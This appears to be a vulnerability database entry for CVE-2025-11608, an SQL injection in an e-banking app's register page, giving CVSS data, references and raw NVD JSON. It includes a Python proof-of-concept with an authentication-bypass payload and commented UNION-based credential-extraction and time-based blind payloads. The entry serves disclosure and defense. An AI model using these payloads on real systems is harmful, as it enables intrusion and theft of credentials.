CVE-2025-11608

Description

A security vulnerability has been detected in code-projects E-Banking System 1.0. This affects an unknown function of the file /register.php of the component POST Parameter Handler. The manipulation of the argument username/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:simple_e-banking_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects E-Banking System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11608 - code-projects E-Banking System SQL Injection PoC
# Vulnerability: SQL Injection in /register.php via username/password POST parameters
# Author: lakshayyverma (CVE-Discovery)
# Tested on: code-projects E-Banking System 1.0

import requests

# Target configuration
TARGET_URL = "http://target.com/register.php"

# SQL Injection payload - testing authentication bypass via username field
payload_username = "admin' OR '1'='1' -- "
payload_password = "anything"

# POST data with malicious SQL injection in username parameter
data = {
    "username": payload_username,
    "password": payload_password,
    "submit": "Register"  # or whatever the submit button name is
}

# Send the malicious request
response = requests.post(TARGET_URL, data=data)

# Check response for successful injection indicators
if response.status_code == 200:
    print("[+] SQL Injection payload sent successfully")
    print(f"[+] Response length: {len(response.text)}")
    # Check for database error messages or successful bypass indicators
    if "error" in response.text.lower() or "syntax" in response.text.lower():
        print("[+] Database error detected - vulnerability confirmed")
    elif "welcome" in response.text.lower() or "dashboard" in response.text.lower():
        print("[+] Authentication bypassed - injection successful")
else:
    print(f"[-] Request failed with status code: {response.status_code}")

# Alternative: UNION-based injection to extract database information
# payload_username = "' UNION SELECT 1,username,password,4 FROM admin-- "
# payload_password = "test"

# Alternative: Time-based blind injection
# payload_username = "admin' AND SLEEP(5)-- "
# payload_password = "test"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11608
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11608
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11608/
[4] VulDB https://vuldb.com/cve/CVE-2025-11608
[5] https://code-projects.org/
[6] https://github.com/lakshayyverma/CVE-Discovery/blob/main/E-Banking%20System%20SQLi.md
[7] https://vuldb.com/?ctiid.327930
[8] https://vuldb.com/?id.327930
[9] https://vuldb.com/?submit.672559
[10] https://github.com/lakshayyverma/CVE-Discovery/blob/main/E-Banking%20System%20SQLi.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11608", "sourceIdentifier": "[email protected]", "published": "2025-10-11T17:15:38.523", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in code-projects E-Banking System 1.0. This affects an unknown function of the file /register.php of the component POST Parameter Handler. The manipulation of the argument username/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:simple_e-banking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DED1A614-568F-49D9-A364-A8ECC0E6B07C"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/E-Banking%20System%20SQLi.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327930", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327930", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.672559", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/E-Banking%20System%20SQLi.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}